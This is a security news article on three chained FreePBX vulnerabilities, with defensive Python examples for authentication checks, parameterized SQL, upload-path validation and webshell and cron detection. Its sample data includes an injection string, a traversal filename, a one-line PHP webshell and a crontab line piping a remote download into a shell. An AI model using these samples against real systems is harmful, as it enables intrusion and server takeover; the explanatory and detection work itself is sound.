By AUDITWOLF, 16 Dec 2025

Phantom Calls: FreePBX Flaws Let Hackers Slip Past Defenses for Full System Takeover

A trio of critical vulnerabilities in FreePBX exposes thousands of VoIP systems to stealthy remote attacks, putting businesses and communications at risk.

It started with a phone call that never happened. Behind the scenes, a silent exploit was unfolding - one that could let attackers waltz through the digital doors of FreePBX, the backbone of countless business phone systems worldwide. In a newly uncovered attack chain, researchers have revealed how cybercriminals could bypass authentication, plunder databases, and execute malicious code - all without a single legitimate credential.

Fast Facts

  • Three chained vulnerabilities (CVE-2025-66039, CVE-2025-61675, CVE-2025-61678) enable unauthenticated remote code execution in FreePBX.
  • The attack begins with an authentication bypass that tricks the system into accepting forged credentials.
  • Once inside, attackers can perform SQL injection to steal or manipulate sensitive data.
  • A file upload flaw then lets hackers implant webshells to seize full control of the server.
  • Patched versions (16.0.92, 17.0.22) are available, but improper configuration may leave systems exposed.

FreePBX is the open-source VoIP management platform powering the communication lines of hospitals, law firms, and enterprises around the globe. Its popularity has made it a prime target for cybercriminals - and this latest revelation from Horizon3.ai proves just how far a determined attacker can go.

The saga unfolds with CVE-2025-66039, a flaw in the way FreePBX trusts web server authentication. By crafting fake Authorization headers, attackers can convince the system they’re legitimate users, even when they’re not. The root of the problem? FreePBX blindly accepts authentication decisions made by the Apache web server, without double-checking inside its own code. This opens the gate for unauthenticated access to sensitive endpoints.
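The pattern behind this kind of bypass is easier to see in code. The following is an added illustration written for this article, not FreePBX's own code: a handler that treats the mere presence of an `Authorization` or `REMOTE_USER` value as proof that the web server already authenticated the request, next to one that re-validates the credential against its own store. The credential store, salt and password are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed credential store for the illustration: username -> salted SHA-256
# digest. This is NOT FreePBX's user table or password scheme.
_SALT = b"example-salt"
_USERS = {"admin": hashlib.sha256(_SALT + b"correct horse battery").hexdigest()}


def basic_header(username: str, password: str) -> str:
    """Build an HTTP Basic Authorization header value."""
    return "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()


def trusts_web_server(environ: dict) -> bool:
    """Vulnerable pattern: the application assumes the front-end web server
    already authenticated the request, so the mere presence of REMOTE_USER or
    an Authorization header is taken as proof of identity. If the web server
    was never configured to enforce auth on this path, anyone can set these."""
    return bool(environ.get("REMOTE_USER") or environ.get("HTTP_AUTHORIZATION"))


def verifies_itself(environ: dict) -> bool:
    """Hardened pattern: the application re-validates the credential carried in
    the header against its own store instead of trusting that someone else did."""
    scheme, _, token = environ.get("HTTP_AUTHORIZATION", "").partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        username, _, password = base64.b64decode(token, validate=True).decode().partition(":")
    except ValueError:  # malformed base64 or non-UTF-8 payload
        return False
    expected = _USERS.get(username)
    if expected is None:
        return False
    actual = hashlib.sha256(_SALT + password.encode()).hexdigest()
    return hmac.compare_digest(actual, expected)  # constant-time comparison


if __name__ == "__main__":
    forged = {"HTTP_AUTHORIZATION": basic_header("admin", "not-the-password")}
    print("trusting handler accepts forged header:", trusts_web_server(forged))
    print("verifying handler accepts forged header:", verifies_itself(forged))
```

The point of the comparison is the one the article makes: authentication decided in the web server configuration is only as strong as that configuration, so the application must either enforce it again itself or refuse to serve sensitive endpoints when it cannot.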

But the attack doesn’t stop there. Once inside, CVE-2025-61675 comes into play: a suite of SQL injection bugs lurking within the Endpoint Management module. With these, intruders can read from and write to the FreePBX database - extracting confidential information or even creating new, unauthorized admin accounts. Researchers demonstrated just how easily a bad actor could exfiltrate data or set up backdoors using these flaws.
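To make the injection class concrete, here is an added example (not FreePBX code; the table, rows and lookup are constructed for the illustration) that builds the same query two ways against an in-memory SQLite database: once by splicing the input into the SQL text, once with a bound parameter. The concatenated version lets one crafted value return every row; the parameterized version treats the same value as a literal MAC address that matches nothing.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed table standing in for a phone-provisioning lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE endpoints (id INTEGER PRIMARY KEY, mac TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO endpoints (mac, owner) VALUES (?, ?)",
        [("00:11:22:33:44:55", "alice"), ("66:77:88:99:aa:bb", "bob")],
    )
    return conn


def lookup_concatenated(conn: sqlite3.Connection, mac: str) -> list:
    """Vulnerable: user input becomes part of the SQL statement itself."""
    sql = f"SELECT owner FROM endpoints WHERE mac = '{mac}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, mac: str) -> list:
    """Hardened: the driver binds the value; it can never alter the statement."""
    return [row[0] for row in conn.execute("SELECT owner FROM endpoints WHERE mac = ?", (mac,))]


if __name__ == "__main__":
    db = make_db()
    crafted = "x' OR '1'='1"
    print("concatenated:", lookup_concatenated(db, crafted))   # every owner
    print("parameterized:", lookup_parameterized(db, crafted))  # nothing
```

Parameter binding is the fix for the whole class, not for one payload: since the statement text is fixed before the value arrives, no input can turn a read into a write or add a second statement.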

The finale is CVE-2025-61678, a vulnerability in the firmware upload system. By manipulating file paths and bypassing security checks, attackers can upload malicious PHP files (webshells) directly to directories accessible via the web - granting them the power to execute any command and seize total control of the server.
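An upload handler that stays out of this trouble has to decide the destination itself rather than let the client steer it. The following is an added example written for this article (not FreePBX's upload code; the firmware directory and the allow-list of extensions are assumptions for the illustration) showing the three checks that matter: a bare file name with no directory components, an allow-listed final extension with no PHP variant anywhere in the name, and a resolved destination that is still inside the intended directory.

```python
import os
from pathlib import Path

# Assumed layout for the illustration; these are not FreePBX's real directories.
FIRMWARE_DIR = Path("/var/lib/example-pbx/firmware")
ALLOWED_SUFFIXES = {".bin", ".img", ".gz"}  # constructed allow-list of firmware types


def safe_upload_path(filename: str, base: Path = FIRMWARE_DIR) -> Path:
    """Return where an uploaded firmware file may be written, or raise ValueError.

    Three independent checks: the client-supplied name must be a bare file name
    (no directory separators, so '../' cannot steer the write), the final
    extension must be allow-listed and no extension may be a PHP variant
    (blocks shell.php and shell.php.bin alike), and the resolved destination
    must still lie inside `base` (a last line of defence if `base` is a symlink).
    """
    name = os.path.basename(filename)
    if name != filename or "\\" in name or name in ("", ".", ".."):
        raise ValueError("directory components are not allowed")
    suffixes = [s.lower() for s in Path(name).suffixes]
    if not suffixes or suffixes[-1] not in ALLOWED_SUFFIXES:
        raise ValueError("file type not allowed")
    if any(s.startswith(".ph") for s in suffixes):  # .php, .phtml, .phar, ...
        raise ValueError("PHP-like extension not allowed")
    dest = (base / name).resolve()
    if base.resolve() not in dest.parents:
        raise ValueError("destination escapes the upload directory")
    return dest


def is_accepted(filename: str) -> bool:
    """Convenience wrapper: True if `filename` passes every check."""
    try:
        safe_upload_path(filename)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for candidate in ["fw-1.0.bin", "update.tar.gz", "../../var/www/html/shell.php",
                      "shell.php", "shell.php.bin"]:
        print(f"{candidate!r}: {'accepted' if is_accepted(candidate) else 'rejected'}")
```

Keeping the upload directory outside the web root, as the constructed `FIRMWARE_DIR` here is, is the complementary control: even a file that slips past the name checks is then not reachable by URL and cannot be executed by the web server.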

While patches have been released for affected versions, the risk remains for organizations that have configured their systems with non-standard authentication or have yet to upgrade. Security teams are urged to audit their systems for telltale signs: unauthorized database entries, suspicious cron jobs, and unfamiliar files lurking in web directories.
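The three telltale signs named above can be checked mechanically. The script below is an added example for this article, not a tool from FreePBX or the researchers: it scores PHP files in a web root on three signals (absent from a package baseline, recently modified, and code execution fed by request input), flags crontab entries that match no allow-listed command, and diffs the current admin list against a recorded baseline. The web root path, the baseline, the crontab text, the IP address and the account names are all constructed sample data.

```python
import re
from datetime import datetime, timedelta

# PHP calls that evaluate code or run commands, and the request superglobals.
# Legitimate code uses some of these too, so neither match is a verdict on its own.
DANGEROUS_CALL = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def suspicious_php_files(files, known_paths, now, max_age_days=30):
    """files: iterable of (path, mtime as datetime, content). A file is reported
    when at least two of three signals hold: not in the package baseline,
    modified within the window, and code execution fed by request input."""
    cutoff = now - timedelta(days=max_age_days)
    findings = []
    for path, mtime, content in files:
        if not path.lower().endswith((".php", ".phtml", ".phar")):
            continue
        signals = {
            "unknown": path not in known_paths,
            "recent": mtime >= cutoff,
            "shell_like": bool(DANGEROUS_CALL.search(content) and REQUEST_INPUT.search(content)),
        }
        if sum(signals.values()) >= 2:
            findings.append((path, [k for k, v in signals.items() if v]))
    return findings


def unexpected_cron_lines(crontab_text, allowed_patterns):
    """Return crontab entries whose command matches none of the allowed regexes.
    Blank lines, comments and VAR=value lines are skipped."""
    flagged = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if not any(re.search(p, line) for p in allowed_patterns):
            flagged.append(line)
    return flagged


def unexpected_admins(current, baseline):
    """Admin accounts present now that were not in the recorded baseline."""
    return sorted(set(current) - set(baseline))


# --- Constructed sample data (not taken from any real system or from the advisory) ---
NOW = datetime(2025, 12, 16)
WEB_ROOT = "/var/www/html"  # assumed web root for the illustration
KNOWN_PATHS = {f"{WEB_ROOT}/index.php", f"{WEB_ROOT}/admin/config.php"}
FILES = [
    (f"{WEB_ROOT}/index.php", datetime(2025, 1, 10), "<?php require 'admin/bootstrap.php';"),
    (f"{WEB_ROOT}/admin/config.php", datetime(2025, 12, 10), "<?php exec('uptime', $out);"),
    (f"{WEB_ROOT}/admin/assets/x.php", datetime(2025, 12, 15), "<?php eval($_POST['c']);"),
    (f"{WEB_ROOT}/readme.txt", datetime(2025, 12, 15), "eval($_GET['x']) in a text file is ignored"),
]
CRONTAB = """# m h dom mon dow command
PATH=/usr/local/sbin:/usr/sbin:/usr/bin
*/5 * * * * /usr/local/bin/pbx-maintenance.sh >/dev/null 2>&1
0 3 * * * /usr/bin/curl -s http://198.51.100.7/x | sh
"""
ALLOWED_CRON = [r"/usr/local/bin/pbx-maintenance\.sh"]


if __name__ == "__main__":
    for path, why in suspicious_php_files(FILES, KNOWN_PATHS, NOW):
        print("file ", path, why)
    for line in unexpected_cron_lines(CRONTAB, ALLOWED_CRON):
        print("cron ", line)
    for user in unexpected_admins(["admin", "svc-backup"], ["admin"]):
        print("admin", user)
```

On a real host the `files` tuples would come from walking the web root and the baseline from the package manager's file list; the two-of-three rule keeps known files that legitimately call `exec()` from being reported while still catching a fresh, unknown file that evaluates request input.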

The FreePBX incident is a stark reminder that even trusted, open-source platforms can harbor dangerous secrets. For organizations relying on VoIP, vigilance isn’t just about patching - it's about understanding the hidden pathways hackers exploit and staying a step ahead in the ever-evolving cybersecurity landscape.

WIKICROOK

  • VoIP: VoIP lets users make phone calls via the internet, offering cost savings and flexibility, but also introduces unique cybersecurity risks.
  • Authentication Bypass: Authentication bypass is a vulnerability that lets attackers skip or trick the login process, gaining access to systems without valid credentials.
  • SQL Injection: SQL Injection is an attack in which crafted input is inserted into a database query so that the database executes commands the application never intended.
  • Webshell: A webshell is a hidden program uploaded by hackers to a compromised website, giving them remote control and unauthorized access like a secret backdoor.
  • Endpoint: An endpoint is any device, such as a computer or smartphone, that connects to a network and must be kept secure and updated to prevent cyber threats.
Tags: FreePBX, VoIP, Cybersecurity
